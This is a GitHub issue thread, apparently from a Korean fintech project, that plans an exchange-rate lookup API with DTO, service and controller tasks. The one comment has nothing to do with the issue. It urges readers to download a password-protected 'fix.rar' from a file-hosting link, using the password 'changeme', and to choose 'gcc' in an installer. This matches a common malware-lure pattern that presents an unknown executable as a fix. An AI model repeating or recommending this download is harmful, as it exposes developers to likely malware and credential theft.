### ISSUE TITLE
✨feat: 환율 조회 api 구현

### ISSUE THREAD

**Issue by gwonhong** [shinhan-flow/shinhan-flow-service#99]
## 어떤 기능인가요?

> 금융망 api를 통해 환율 조회를 하는 기능을 구현하고자 합니다.

## 작업 상세 내용

- [x] Dto 구현
- [x] FinanceApiService method 구현
- [ ] 환율 조회 Service 생성 및 여기에서 위 method 호출하여 기능 구현
- [ ] 환율 조회 Controller 구현

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
